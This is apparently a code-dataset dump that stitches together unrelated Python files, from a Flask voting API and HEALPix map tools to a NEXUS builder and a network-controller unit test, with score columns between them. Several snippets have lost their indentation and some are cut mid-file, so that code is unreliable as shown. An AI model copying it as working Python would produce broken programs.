"""Print the count of relationships."""
objs_r1_all = set(o for o in godag.values() if o.relationship.keys())
octr = cx.Counter(k for o in objs_r1_all for k in o.relationship.keys())
# objs_r1_sub = set(o.id for o in objs_r1_all if not rels_all.isdisjoint(o.relationship.keys()))
print('{N:6,} GO Terms have relationships.'.format(N=len(objs_r1_all)))
for key, cnt in octr.most_common():
print('{N:6,} {REL}'.format(N=cnt, REL=key))
# def _chk_child_parent(go2o_dag, go2o_sub):
# """Check the differences between the two go2obb dicts."""
# pass
if __name__ == '__main__':
test_gosubdag_relationships(len(sys.argv) != 1)
# Copyright (C) 2016-2019, <NAME>, <NAME>, All rights reserved.
| 2.09375 | 2 |
booleans_operators.py | CrazyJ36/python | 0 | 12795692 | <reponame>CrazyJ36/python
#!/usr/bin/env python3
# and, or, not
if 1 < 2 and 1 < 3:
print("true")
else:
print("false")
if 1 < 0 or 1 > 2:
print("true")
else:
print("false")
if 1 != 2:
print("true")
if 1 != 2:
print("true")
if not 1 < 0: # "not <expr>" negates the expression
print("1 is not less than 0")
| 4.4375 | 4 |
base/apis/views.py | danielecook/upvote.pub | 1 | 12795693 | <filename>base/apis/views.py
# -*- coding: utf-8 -*-
"""
All view code for async get/post calls towards the server
must be contained in this file.
"""
import arrow
from flask import (Blueprint, request, render_template, flash, g,
session, redirect, url_for, jsonify, abort)
from werkzeug import check_password_hash, generate_password_hash
from logzero import logger
from base import db
from base.users.models import User
from base.threads.models import Thread, Comment
from base.users.decorators import requires_login
from base.utils.misc import generate_csrf_token
from base.utils.text_utils import format_comment
mod = Blueprint('apis', __name__, url_prefix='/apis')
@mod.before_request
def before_request():
g.user = None
if 'user_id' in session:
g.user = User.query.get(session['user_id'])
@mod.before_request
def csrf_protect():
if request.method == "POST":
token = session.pop('csrf_token', None)
if not token or token != request.form.get('csrf_token'):
abort(403)
@mod.route('/comments/submit/', methods=['POST'])
@requires_login
def submit_comment():
"""
Submit comments via ajax
"""
# Check that user has not submitted more than 20 comments
# in the last hour.
user_id = g.user.id
if not user_id:
abort(404)
since = arrow.utcnow().shift(hours=-1).datetime
submission_count = Comment.query.filter(Comment.user_id == user_id, Comment.created_on > since).count()
if submission_count >= 20:
return jsonify(error='You have been submitting too many comments')
thread_id = int(request.form['thread_id'])
comment_text = request.form['comment_text']
comment_parent_id = request.form['parent_id'] # empty means none
if not comment_text:
abort(404)
thread = Thread.query.get_or_404(int(thread_id))
thread.n_comments += 1
db.session.commit()
comment = thread.add_comment(comment_text,
comment_parent_id,
g.user.id)
return jsonify(comment_text=format_comment(comment.text),
date=comment.pretty_date(),
username=g.user.username,
comment_id=comment.id,
csrf_token=generate_csrf_token())
@mod.route('/threads/vote/', methods=['POST'])
@requires_login
def vote_thread():
"""
Submit votes via ajax
"""
thread_id = int(request.form['thread_id'])
user_id = g.user.id
if not thread_id:
abort(404)
thread = Thread.query.get_or_404(int(thread_id))
vote_status = thread.vote(user_id=user_id)
return jsonify(new_votes=thread.votes,
vote_status=vote_status,
csrf_token=generate_csrf_token())
@mod.route('/threads/save/', methods=['POST'])
@requires_login
def save_thread():
"""
Submit votes via ajax
"""
thread_id = int(request.form['thread_id'])
user_id = g.user.id
if not thread_id:
abort(404)
thread = Thread.query.get_or_404(int(thread_id))
save_status = thread.save(user_id=user_id)
return jsonify(new_saves=thread.saves,
save_status=save_status,
csrf_token=generate_csrf_token())
@mod.route('/comments/vote/', methods=['POST'])
@requires_login
def vote_comment():
"""
Submit votes via ajax
"""
comment_id = int(request.form['comment_id'])
user_id = g.user.id
if not comment_id:
abort(404)
comment = Comment.query.get_or_404(int(comment_id))
comment.vote(user_id=user_id)
logger.info(comment.votes)
return jsonify(votes=comment.votes,
csrf_token=generate_csrf_token())
| 2.28125 | 2 |
robotpose/__init__.py | OSU-AIMS/RoPE-S3D | 1 | 12795694 | from .wizards import Wizard
from .data import Dataset, DatasetInfo, AutomaticAnnotator
from .simulation import Renderer, DatasetRenderer, RobotLookupCreator
from .prediction import Predictor, LiveCamera
from .paths import Paths
from .prediction.analysis import Grapher
from .prediction.synthetic import SyntheticPredictor
from .textfile_integration import JSONCoupling
from .projection import Intrinsics
import logging
logging.basicConfig(level=logging.INFO)
Paths().create()
| 1.21875 | 1 |
altair/vegalite/v2/schema/__init__.py | hydrosquall/altair | 0 | 12795695 | <filename>altair/vegalite/v2/schema/__init__.py
from .core import *
from .channels import * | 1.078125 | 1 |
code/1078.py | Nightwish-cn/my_leetcode | 23 | 12795696 | <reponame>Nightwish-cn/my_leetcode<filename>code/1078.py
class Solution:
def findOcurrences(self, text: str, first: str, second: str) -> List[str]:
lis = text.split()
l = len(lis)
return [lis[i + 2] for i in range(0, l - 2) if lis[i] == first and lis[i + 1] == second] | 2.96875 | 3 |
Tectonic_Utils/geodesy/euler_pole.py | kmaterna/Utility_Code | 4 | 12795697 | """
Functions to rotate a point by a known euler pole.
"""
import numpy as np
from . import fault_vector_functions
def point_rotation_by_Euler_Pole(Point, Euler_Pole):
"""
Compute the velocity of rotation of a point about an Euler pole on a spherical earth.
This function is useful for computing the velocity of a stationary point in one reference frame
with respect to another reference frame.
The resulting velocity is assumed to be horizontal.
:param Point: [longitude, latitude] of observation point, in degrees
:type Point: array_like
:param Euler_Pole: [longitude, latitude, omega] of Euler Pole, in degrees and degrees/Ma
:type Euler_Pole: array_like
:returns: [e_velocity, n_velocity, u_velocity] of point in rotated reference frame, in mm/yr
:rtype: array_like
"""
R_point = get_r(Point[0], Point[1]);
R_ep = get_r(Euler_Pole[0], Euler_Pole[1]);
unit_ep = fault_vector_functions.get_unit_vector(R_ep);
omega_raw = degma2radyr(Euler_Pole[2]);
omega = omega_raw * unit_ep; # in radians per year
velocity_of_transformation = np.cross(omega, R_point); # velocity at the station from the euler pole rotation
velocity_of_transformation = velocity_of_transformation * 1000; # mm/yr in x, y, z
xvel = velocity_of_transformation[0];
yvel = velocity_of_transformation[1];
zvel = velocity_of_transformation[2];
[east_transform, north_transform] = xyz2en(xvel, yvel, zvel, Point[0]);
up_transform = 0; # by definition the velocity will be horizontal
return [east_transform, north_transform, up_transform];
def degma2radyr(omega):
"""Convert omega from degrees/Ma to radians/yr"""
radyr = omega * (np.pi / 180) * 1e-6;
return radyr;
def get_r(lon, lat):
"""
Vector from center of earth to the point in question assuming a spherical earth.
The XYZ coordinate system has x=0 at longitude=0 and z=0 at the equator with positive to the north.
:param lon: Longitude of initial point, in degrees
:type lon: float
:param lat: Latitude of initial point, in degrees
:type lat: float
:returns: [X, Y, Z] coordinates in meters.
:rtype: [float, float, float]
"""
R_fixed = 6378000; # In meters
R_equatorial_disk = R_fixed * np.cos(np.deg2rad(lat));
T_equatorial_disk = np.deg2rad(lon);
X = R_equatorial_disk * np.cos(T_equatorial_disk);
Y = R_equatorial_disk * np.sin(T_equatorial_disk);
Z = np.sqrt(R_fixed * R_fixed - X * X - Y * Y);
if lat < 0:
Z = Z * -1;
return [X, Y, Z];
def get_unit_east(lon):
"""
Unit east vector from a point on earth's surface in XYZ coordinates.
The XYZ coordinate system has x=0 at longitude=0 and z=0 at the equator with positive to the north.
The return value of Z is zero for eastward motion.
:param lon: Longitude of initial point, in degrees
:type lon: float
:returns: [X, Y, Z] components
:rtype: [float, float, float]
"""
T_equatorial_disk = np.deg2rad(lon);
x = -np.sin(T_equatorial_disk);
y = np.cos(T_equatorial_disk);
return [x, y, 0];
def xyz2en(x, y, z, lon):
"""
Convert velocities from xyz to horizontal east and north, assuming spherical earth and no vertical motion.
We take the dot product of the velocity with the unit east vector and the north component is the remainder.
A more complex function xyz2enu(X, Y, Z, lon, lat) could be written later.
:param x: x velocity at observation point
:type x: float
:param y: y velocity at observation point
:type y: float
:param z: z velocity at observation point
:type z: float
:param lon: Longitude of observation point, in degrees
:type lon: float
:returns: [east_vel, north_vel]
:rtype: [float, float]
"""
vel_vector = [x, y, z];
unit_east = get_unit_east(lon);
e = np.dot(vel_vector, unit_east);
n = np.sqrt(x * x + y * y + z * z - e * e);
if z < 0:
n = n * -1;
return [e, n];
if __name__ == "__main__":
Euler_Pole = [69.9, -12.3, 0.55]; # Lon, Lat, Deg/Ma
Point = [-124, 40.5]; # Lon, Lat
[east_transform, north_transform, up_transform] = point_rotation_by_Euler_Pole(Point, Euler_Pole);
total = np.sqrt(east_transform * east_transform + north_transform * north_transform);
print("%.2f east, %.2f north, %.2f up, %.2f mm/yr total" % (east_transform, north_transform, up_transform, total));
| 3.953125 | 4 |
comparer.py | Wason1/Multum | 0 | 12795698 | # Variables
base_list = 'List_1' # this is the base list, each item in this list is checked for a match in the other
list_2 = 'List_2' # List_2 is the name of the list in the excel file
xlfile = 'DATA_IN.xlsx'
# Importing Libs
import pandas as pd
import numpy as np
# Smart Stuff
df_0 = pd.read_excel(xlfile, dtype=str)
#rename columns
df_0.rename(columns={base_list: "base_list", list_2: "list_2"}
, inplace=True)
df = pd.DataFrame()
#create new df
df['base_list'] = df_0['base_list']
# create new columns
df['Exact Matches'] = ''
df['Words Matched'] = ''
# unique list of words in list 2
list_2_words = ' '.join([i for i in df_0['list_2']]).split()
list_2_words = list(dict.fromkeys(list_2_words))
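# e.g. a list_2 of ["red apple", "apple pie"] gives ["red", "apple", "pie"]
# (duplicates removed, order of first appearance kept)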
# loop through keys
for index, row in df.iterrows():
current_key = str(row['base_list'])
count = (df_0.list_2 == current_key).sum()
# write results back with .at - assigning to the row returned by iterrows()
# only modifies a copy, not the DataFrame itself
df.at[index, 'Exact Matches'] = count
current_key_list = current_key.split(' ')
words_matched = ''
for item in current_key_list:
if item in list_2_words:
words_matched = words_matched + '|' + item
df.at[index, 'Words Matched'] = words_matched
# Dump Excel Sheet
df.to_excel('DATA_OUT.xlsx')
| 3.359375 | 3 |
src/common.py | daffidwilde/edo-paper | 0 | 12795699 | """ Common functions and parameters amongst the experiments. """
from edo.distributions import Uniform
from sklearn.preprocessing import MinMaxScaler
def scale_dataframe(individual):
""" Scale the individual's dataframe to the unit square for calculating
fitness. """
original = individual.dataframe.copy()
dataframe = MinMaxScaler().fit_transform(original)
return dataframe
size = 100
row_limits = [50, 100]
col_limits = [2, 2]
max_iter = 100
best_prop = 0.1
mutation_prob = 0.01
Uniform.param_limits["bounds"] = [0, 1]
distributions = [Uniform]
root = "../data/"
| 3 | 3 |
pycs/sparsity/mrs/mrs_tools.py | sfarrens/cosmostat | 3 | 12795700 |
import numpy as np
import random
import os, sys
from scipy import ndimage
import healpy as hp
from astropy.io import fits
import matplotlib.pyplot as plt
from scipy.signal import savgol_filter
from astropy.io import fits
from importlib import reload
from pycs.misc.cosmostat_init import *
from pycs.misc.mr_prog import *
def make_healpix_map(ra, dec, weights, nside):
pixels= hp.ang2pix(nside,theta = 0.5*np.pi - np.deg2rad(dec), phi = np.deg2rad(ra))
bincount = np.bincount(pixels, minlength = hp.nside2npix(nside))
bincount_weighted = np.bincount(pixels, minlength = hp.nside2npix(nside), weights=weights)
return np.where(bincount>0.5, bincount_weighted/bincount, hp.UNSEEN)
def get_bincount(ra, dec, nside):
pixels= hp.ang2pix(nside,theta = 0.5*np.pi - np.deg2rad(dec), phi = np.deg2rad(ra))
bincount = np.bincount(pixels, minlength = hp.nside2npix(nside))
return bincount
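# Usage sketch for make_healpix_map (assumes ra and dec are 1-D numpy arrays in
# degrees, weights has the same length, and nside is a valid HEALPix resolution):
#   nside = 256
#   wmap = make_healpix_map(ra, dec, weights, nside)
#   hp.mollview(wmap)   # pixels with no hits are set to hp.UNSEEN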
def mrs_read(FN):
return hp.read_map(FN)
def mrs_write(FN, mapin):
hp.write_map(FN, mapin, overwrite=True)
def rims(FN):
return hp.read_map(FN)
def mrs_resize(mapin, nsideout):
k = hp.ud_grade(mapin, nsideout)
return k
# smoothing with sigma in arcmin
def smooth(mapin, sigma):
s = hp.smoothing(mapin, sigma=sigma / (360. * 60.) * (np.pi * 2), pol=False)
return s
# lut='rainbow' # 'inferno' 'gist_stern'
def tvs(mapin,min=None,max=None,title=None,sigma=None,lut=None):
if sigma is None:
hp.mollview(mapin,max=max,min=min, title=title,cmap=lut)
else:
s= hp.smoothing(mapin, sigma=sigma/(360.*60.) * (np.pi*2),pol=False)
hp.mollview(s,max=max,min=min, title=title,cmap=lut)
hp.mollview
def get_nside(Npix):
return hp.npix2nside(Npix)
def gnside(data):
npix = data.shape[0]
nside = hp.npix2nside(npix)
return nside
def pixel_size(nside):
# Return the pixel size of a healpix map in arc minutes
# SKI_SURFACE IN SQUARE DEGREES = 4. * !PI * (360. / (2*!PI))^2 = 41253
psize = 41253. / (float(nside)**2.*12.) * 60.**2.
return np.sqrt(psize)
def l2amin(l):
a = 1. / l
a = a * 180.* 60. / np.pi
return a
def amin2l(a):
ar = a / (180.* 60.) * np.pi
l = 1. / ar
return l
def g2eb(g1,g2):
nside = gnside(g1)
(ae,ab) = hp.map2alm_spin((g1,g2), 2)
ke= hp.alm2map(ae, nside, pol=False)
kb= hp.alm2map(ab, nside, pol=False)
return ke,kb
def g2k(g1,g2):
nside = gnside(g1)
(ae,ab) = hp.map2alm_spin((g1,g2), 2)
ke= hp.alm2map(ae, nside, pol=False)
return ke
def k2g(ke):
nside = gnside(ke)
lmax = 3 * nside - 1
ae = hp.map2alm(ke, lmax=lmax, pol=False)
ab = np.copy(ae) * 0.
(g1, g2) = hp.alm2map_spin((ae, ab), nside, 2, lmax)
return g1, g2
# note: hp.alm2map_spin needs alm arrays computed with the same lmax it is given.
def eb2g(ke, kb):
nside = gnside(ke)
lmax = nside * 3 - 1
ae = hp.map2alm(ke, lmax=lmax, pol=False)
ab = hp.map2alm(kb, lmax=lmax, pol=False)
(g1, g2) = hp.alm2map_spin((ae, ab), nside, 2, lmax)
return g1, g2
def mrs_prog(data, prog="mrs_powspec", opt=None, path='./', remove_files=True, verbose=False, FileOut=None, InputFormatisHealpix=True, OutputFormatisHealpix=True):
# Create a unique string using the current date and time.
# print('mr_filter ', opt)
unique_string = datetime.now().strftime('%Y.%m.%d_%H.%M.%S')
result=0
# Set the ouput file names.
file_name = path + 'mr_temp_' + unique_string
file_fits = file_name + '.fits'
if FileOut is not None:
file_out = FileOut
else:
file_out = file_name + '_out.fits'
# Write the input data to a fits file.
if InputFormatisHealpix:
mrs_write(file_fits, data)
else:
writefits(file_fits, data)
# print("PROG: ", prog)
cmd = prog
if isinstance(opt, type(None)):
optF=' '
else:
optF= opt
if verbose:
optF = optF + " -v "
cmd = cmd + " " + optF + " " + file_fits + " " + file_out
if verbose:
print ('CMD = ', cmd)
args = shlex.split(cmd)
# print('args ', args)
call(args)
# Retrieve wavelet filtered data.
if OutputFormatisHealpix:
result = mrs_read(file_out)
else:
result = readfits(file_out)
# Return the mr_transform results (and the output file names).
if remove_files:
remove(file_fits)
remove(file_out)
return result
else:
return result
def mrs_powspec(map, verbose=False):
p = mrs_prog(map, prog="mrs_powspec", verbose=verbose, OutputFormatisHealpix=False)
return p
def mrs_smooth(map, opt=None, verbose=False):
p = mrs_prog(map, prog="mrs_smooth", verbose=verbose, opt=opt, OutputFormatisHealpix=True)
return p
def mrs_almtrans(map, lmax=None, opt=None, verbose=False):
optParam = ' -T '
if opt is not None:
optParam = ' -T ' + opt
if lmax is not None:
optParam = ' -l ' + str(lmax) + optParam
p = mrs_prog(map, prog="mrs_almtrans", verbose=verbose, opt=optParam, OutputFormatisHealpix=False)
return p
def mrs_almrec(map, opt=None, verbose=False,nside=None):
optParam = ' -T '
if opt is not None:
optParam = ' -T ' + opt
if nside is not None:
optParam = ' -n ' + str(nside) + optParam
p = mrs_prog(map, prog="mrs_almrec", verbose=verbose, opt=optParam, InputFormatisHealpix=False, OutputFormatisHealpix=True)
return p
def tol(map,lmax_amin,amin=False):
ns= gnside(map)
lmax=lmax_amin
if amin is True:
lmax=amin2l(lmax_amin)
a = mrs_almtrans(map, lmax=lmax)
b = mrs_almrec(a, nside=ns)
return b
def mrs_uwttrans(map, lmax=None, opt=None, verbose=False, path='./',progpath=None):
optParam = ' '
if opt is not None:
optParam = ' ' + opt
if lmax is not None:
optParam = ' -l ' + str(lmax) + optParam
if progpath is None:
prog="mrs_uwttrans"
else:
prog=progpath+"mrs_uwttrans"
p = mrs_prog(map, prog=prog, verbose=verbose, opt=optParam, OutputFormatisHealpix=False,path=path)
return p
def mrs_uwtrecons(Tmap, lmax=None, opt=None, verbose=False, path='./',progpath=None):
optParam = ' '
if opt is not None:
optParam = ' ' + opt
if lmax is not None:
optParam = ' -l ' + str(lmax) + optParam
if progpath is None:
prog="mrs_uwttrans"
else:
prog=progpath+"mrs_uwttrans -r "
p = mrs_prog(Tmap, prog=prog, verbose=verbose, opt=optParam, InputFormatisHealpix=False, OutputFormatisHealpix=True,path=path)
return p
| 1.984375 | 2 |
tests/contract/test_get_all_catalogs.py | Informasjonsforvaltning/organization-page-bffe | 0 | 12795701 | """Contract test cases for cases for all organization catalogs."""
import json
import pytest
import requests
from tests import responses
@pytest.mark.contract
@pytest.mark.docker
def test_all_catalogs(docker_service: str) -> None:
"""Should return the all_catalogs response."""
url = f"{docker_service}/organizationcatalogs"
response = requests.get(url)
assert response.status_code == 200
assert response.json() == json.loads(responses.all_catalogs)
@pytest.mark.contract
@pytest.mark.docker
def test_all_catalogs_has_no_cache_headers(docker_service: str) -> None:
"""Should include no-cache headers."""
url = f"{docker_service}/organizationcatalogs"
response = requests.get(url)
assert response.status_code == 200
assert (
response.headers.get("Cache-Control")
== "no-cache, no-store, max-age=0, must-revalidate"
)
@pytest.mark.contract
@pytest.mark.docker
def test_all_nap_catalogs(docker_service: str) -> None:
"""Should return the all_nap response."""
url = f"{docker_service}/organizationcatalogs?filter=transportportal"
response = requests.get(url)
assert response.status_code == 200
assert response.json() == json.loads(responses.all_nap)
@pytest.mark.contract
@pytest.mark.docker
def test_invalid_filter(docker_service: str) -> None:
"""Should return 400."""
url = f"{docker_service}/organizationcatalogs?filter=invalid"
response = requests.get(url)
assert response.status_code == 400
| 2.484375 | 2 |
build/build_nexus.py | evotext/ielex-data-and-tree | 2 | 12795702 | """
Builds a NEXUS file from a long-table format CSV.
"""
import csv
from pathlib import Path
from collections import defaultdict
BASE = Path(__file__).parents[1] / "data"
with open(BASE / "ielex.csv", encoding="utf-8") as h:
data = list(csv.DictReader(h))
taxa = sorted(set([row["LANGUAGE"] for row in data]))
cogs = defaultdict(list)
all_cogs = defaultdict(set)
for row in data:
cogs[row["LANGUAGE"], row["CONCEPT"]].append(row["COGNATE"])
all_cogs[row["CONCEPT"]].add(row["COGNATE"])
all_cogs = {key: sorted(value) for key, value in all_cogs.items()}
charstates = []
assumptions = []
cur_idx = 1
for cog in sorted(all_cogs):
value = all_cogs[cog]
k = value[0].split("_")[0]
charstates.append(f"{k}_ascertainment")
for sub in value:
charstates.append(sub)
end_idx = cur_idx + len(value)
assumptions.append([cog, cur_idx, end_idx])
cur_idx = end_idx + 1
matrix = {}
for taxon in taxa:
buf = ""
for concept in sorted(all_cogs):
buf += "0" # ascert
cogids = all_cogs[concept]
# if empty
if len(cogs[taxon, concept]) == 0:
buf += "?" * len(cogids)
else:
vec = [cogid in cogs[taxon, concept] for cogid in cogids]
buf += "".join([["0", "1"][v] for v in vec])
matrix[taxon] = buf
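# Example of the encoding above: for a concept with cognate classes
# ["c_1", "c_2", "c_3"], a taxon coded only in "c_2" contributes "0" (the
# ascertainment column) followed by "010"; a taxon with no cognate data for
# the concept contributes "0???".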
############
taxon_len = max([len(taxon) for taxon in taxa])
nexus = ""
nexus += "#NEXUS\n\n"
nexus += "BEGIN DATA;\n"
nexus += "\tDIMENSIONS NTAX=%i NCHAR=%i;\n" % (len(taxa), len(matrix[taxa[0]]))
nexus += '\tFORMAT DATATYPE=STANDARD MISSING=? GAP=- SYMBOLS="01";\n'
nexus += "\tCHARSTATELABELS\n"
nexus += ",\n".join(["\t\t%i %s" % (idx + 1, cs) for idx, cs in enumerate(charstates)])
nexus += "\n;\n"
nexus += "MATRIX\n"
for taxon, vector in matrix.items():
label = taxon.ljust(taxon_len + 4)
nexus += "%s %s\n" % (label, vector)
nexus += ";\n"
nexus += "END;\n\n"
nexus += "begin assumptions;\n"
for assump in assumptions:
v = all_cogs[assump[0]][0].split("_")[0]
nexus += "\tcharset %s = %i-%i;\n" % (v, assump[1], assump[2])
nexus += "end;\n\n"
print(nexus)
| 2.65625 | 3 |
python/sagiri-bot/SAGIRIBOT/data_manage/get_data/get_rank.py | GG-yuki/bugs | 0 | 12795703 | from graia.application.message.chain import MessageChain
from graia.application.message.elements.internal import Plain
from graia.application.message.elements.internal import At
from SAGIRIBOT.basics.aio_mysql_excute import execute_sql
async def get_rank(group_id: int, memberList: list) -> list:
sql = "select * from dragon where groupId=%d order by count desc" % group_id
lsp_rank = await execute_sql(sql)
print(lsp_rank)
msg = []
text = "啊嘞嘞,从启动到现在都没有人要过涩图的嘛!呜呜呜~\n人家。。。人家好寂寞的,快来找我玩嘛~"
if lsp_rank == ():
return [
"None",
MessageChain.create([
Plain(text=text)
])
]
else:
lsp_champion_count = lsp_rank[0][3]
if lsp_champion_count == 0:
return [
"None",
MessageChain.create([
Plain(text=text)
])
]
text = "目前lsp排行榜:"
msg.append(Plain(text=text))
text = ""
index = 0
add_bool = False
add = 0
last = -1
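# competition-style ranking below: e.g. counts [5, 5, 3] get ranks 1, 1, 3
# (tied members share a rank and the next rank is skipped)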
for i in lsp_rank:
if i[3] == 0:
break
if i[3] == last:
add += 1
add_bool = True
else:
if add_bool:
index += add
index += 1
add = 0
add_bool = False
last = i[3]
text += "\n%i.%-20s %3d" % (index, qq2name(memberList,i[2]), i[3])
msg.append(Plain(text=text))
return msg | 2.140625 | 2 |
python/ABC111/ABC111A.py | yu8ikmnbgt6y/MyAtCoder | 0 | 12795704 | <gh_stars>0
def chg(n):
if n==1:
return 9
elif n==9:
return 1
return n
n = int(input())
n,a1 = divmod(n,10)
n,a2 = divmod(n,10)
n,a3 = divmod(n,10)
print(100*chg(a3)+10*chg(a2)+chg(a1)) | 3.109375 | 3 |
day11/test_day11.py | Frost/aoc2021-py | 0 | 12795705 |
from day11 import *
test_input = """
5483143223
2745854711
5264556173
6141336146
6357385478
4167524645
2176841721
6882881134
4846848554
5283751526
"""
def test_cave_constructor():
cave = Cave(["12", "34"])
assert cave.energy_levels() == [[1,2], [3,4]]
def test_simple_tick():
test_data = """
11111
19991
19191
19991
11111
""".strip().split("\n")
cave = Cave(test_data)
assert cave.tick() == 9
assert cave.energy_levels() == [
[3, 4, 5, 4, 3],
[4, 0, 0, 0, 4],
[5, 0, 0, 0, 5],
[4, 0, 0, 0, 4],
[3, 4, 5, 4, 3],
]
assert cave.tick() == 0
assert cave.energy_levels() == [
[4,5,6,5,4],
[5,1,1,1,5],
[6,1,1,1,6],
[5,1,1,1,5],
[4,5,6,5,4],
]
def test_flashes():
lines = test_input.strip().split("\n")
cave = Cave(lines)
assert cave.tick() == 0
assert cave.tick() == 35
def test_part1():
lines = test_input.strip().split("\n")
assert part1(lines) == 1656
def test_part2():
lines = test_input.strip().split("\n")
assert part2(lines) == 195
| 2.5 | 2 |
forms/product_form.py | vankrajnova/selenium | 0 | 12795706 | <gh_stars>0
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
class ProductForm:
def __init__(self, app):
self.app = app
self._elements = Elements(app)
def add_product_to_cart(self):
quantity = self._elements.quantity().text
self._elements.add_to_cart_btn().click()
count = int(quantity) + 1
self.app.wait.until(EC.text_to_be_present_in_element((By.XPATH, """//span[contains(@class, "quantity")]"""), str(count)))
class Elements:
def __init__(self, app):
self.app = app
def add_to_cart_btn(self):
xpath = """//button[contains(@name, 'add_cart_product')]"""
return self.app.wd.find_element_by_xpath(xpath)
def quantity(self):
xpath = """//span[contains(@class, "quantity")]"""
return self.app.wd.find_element_by_xpath(xpath) | 2.875 | 3 |
setup.py | dabapps/django-db-queue-exports | 0 | 12795707 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from setuptools import setup
import re
import os
import sys
name = "django-db-queue-exports"
package = "django_dbq_exports"
description = "An extension to django-db-queue for monitoring long running jobs"
url = "https://www.dabapps.com/"
project_urls = {"Source": "https://github.com/dabapps/{}".format(name)}
author = "DabApps"
author_email = "<EMAIL>"
license = "BSD"
with open("README.md") as f:
readme = f.read()
with open("requirements.txt") as f:
requirements = f.read().split("\n")
def get_version(package):
"""
Return package version as listed in `__version__` in `__init__.py`.
"""
init_py = open(os.path.join(package, "__init__.py")).read()
return re.search("^__version__ = ['\"]([^'\"]+)['\"]", init_py, re.MULTILINE).group(
1
)
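# e.g. a package whose __init__.py contains __version__ = "1.2.3" yields "1.2.3"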
def get_packages(package):
"""
Return root package and all sub-packages.
"""
return [
dirpath
for dirpath, dirnames, filenames in os.walk(package)
if os.path.exists(os.path.join(dirpath, "__init__.py"))
]
def get_package_data(package):
"""
Return all files under the root package, that are not in a
package themselves.
"""
walk = [
(dirpath.replace(package + os.sep, "", 1), filenames)
for dirpath, dirnames, filenames in os.walk(package)
if not os.path.exists(os.path.join(dirpath, "__init__.py"))
]
filepaths = []
for base, filenames in walk:
filepaths.extend([os.path.join(base, filename) for filename in filenames])
return {package: filepaths}
setup(
name=name,
version=get_version(package),
url=url,
project_urls=project_urls,
license=license,
description=description,
long_description=readme,
long_description_content_type="text/markdown",
author=author,
author_email=author_email,
packages=get_packages(package),
package_data=get_package_data(package),
install_requires=requirements,
classifiers=[],
include_package_data=True,
zip_safe=False,
options={"build": {"build_base": "tmp_build"}},
)
| 2.015625 | 2 |
dragonflow/tests/unit/test_ryu_base_app.py | FrankDuan/df_code | 0 | 12795708 | <reponame>FrankDuan/df_code
# Copyright (c) 2015 OpenStack Foundation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from dragonflow.controller.ryu_base_app import RyuDFAdapter
from dragonflow.tests import base as tests_base
from oslo_config import cfg
class TestRyuDFAdapter(tests_base.BaseTestCase):
"""
This unit test has to verify that all events are called correctly, both
via the notify* functions, as well as the events called from ryu.
Having ryu call these events will be done in the functional tests.
"""
def setUp(self):
super(TestRyuDFAdapter, self).setUp()
self.db_store = mock.Mock()
cfg.CONF = mock.Mock()
self.ryu_df_adapter = RyuDFAdapter(db_store=self.db_store)
self.mock_app = mock.Mock(spec=[
'update_logical_switch',
'remove_logical_switch',
'add_local_port',
'remove_local_port',
'add_remote_port',
'remove_remote_port',
'add_router_port',
'remove_router_port',
'add_security_group_rule',
'remove_security_group_rule',
'switch_features_handler',
'port_desc_stats_reply_handler',
'packet_in_handler'
])
def dispatcher_load(*args, **kwargs):
self.ryu_df_adapter.dispatcher.apps = [self.mock_app]
self.ryu_df_adapter.dispatcher.load = dispatcher_load
self.ryu_df_adapter.load()
def test_notifies(self):
self.mock_app.reset_mock()
self.ryu_df_adapter.notify_update_logical_switch(lswitch=1)
self.ryu_df_adapter.notify_remove_logical_switch(lswitch=2)
self.ryu_df_adapter.notify_add_local_port(lport=3)
self.ryu_df_adapter.notify_remove_local_port(lport=4)
self.ryu_df_adapter.notify_add_remote_port(lport=5)
self.ryu_df_adapter.notify_remove_remote_port(lport=6)
self.ryu_df_adapter.notify_add_router_port(
router=7, router_port=8, local_network_id=9)
self.ryu_df_adapter.notify_remove_router_port(
router_port=10, local_network_id=11)
self.ryu_df_adapter.notify_add_security_group_rule(
secgroup=12, secgroup_rule=13)
self.ryu_df_adapter.notify_remove_security_group_rule(
secgroup=14, secgroup_rule=15)
self.mock_app.assert_has_calls([
mock.call.update_logical_switch(lswitch=1),
mock.call.remove_logical_switch(lswitch=2),
mock.call.add_local_port(lport=3),
mock.call.remove_local_port(lport=4),
mock.call.add_remote_port(lport=5),
mock.call.remove_remote_port(lport=6),
mock.call.add_router_port(
local_network_id=9, router=7, router_port=8),
mock.call.remove_router_port(
local_network_id=11, router_port=10),
mock.call.add_security_group_rule(
secgroup=12, secgroup_rule=13),
mock.call.remove_security_group_rule(
secgroup=14, secgroup_rule=15)])
def test_switch_features_handler(self):
self.mock_app.reset_mock()
ev = mock.Mock()
ev.msg = mock.Mock()
ev.msg.datapath = mock.Mock()
ev.msg.datapath.ofproto = mock.Mock()
ev.msg.datapath.ofproto.OFP_VERSION = 0x04
self.ryu_df_adapter.switch_features_handler(ev)
self.mock_app.assert_has_calls([mock.call.switch_features_handler(ev)])
def test_port_desc_stats_reply_handler(self):
self.mock_app.reset_mock()
ev = mock.Mock()
self.ryu_df_adapter.port_desc_stats_reply_handler(ev)
self.mock_app.assert_has_calls([
mock.call.port_desc_stats_reply_handler(ev)])
def test_port_status_handler(self):
self.mock_app.reset_mock()
ev = mock.Mock()
ev.msg.reason = ev.msg.datapath.ofproto.OFPPR_ADD
self.ryu_df_adapter._port_status_handler(ev)
port_name = ev.msg.desc.name
lport = self.db_store.get_local_port_by_name(port_name)
self.mock_app.assert_has_calls([mock.call.add_local_port(lport=lport)])
lport.assert_has_calls([
mock.call.set_external_value('ofport', ev.msg.desc.port_no),
mock.call.set_external_value('is_local', True)])
self.mock_app.reset_mock()
ev = mock.Mock()
ev.msg.reason = ev.msg.datapath.ofproto.OFPPR_DELETE
self.ryu_df_adapter._port_status_handler(ev)
port_name = ev.msg.desc.name
lport = self.db_store.get_local_port_by_name(port_name)
self.mock_app.assert_has_calls([
mock.call.remove_local_port(lport=lport)])
#TODO(oanson) Once notification is added, add update_local_port test
def test_packet_in_handler(self):
self.mock_app.reset_mock()
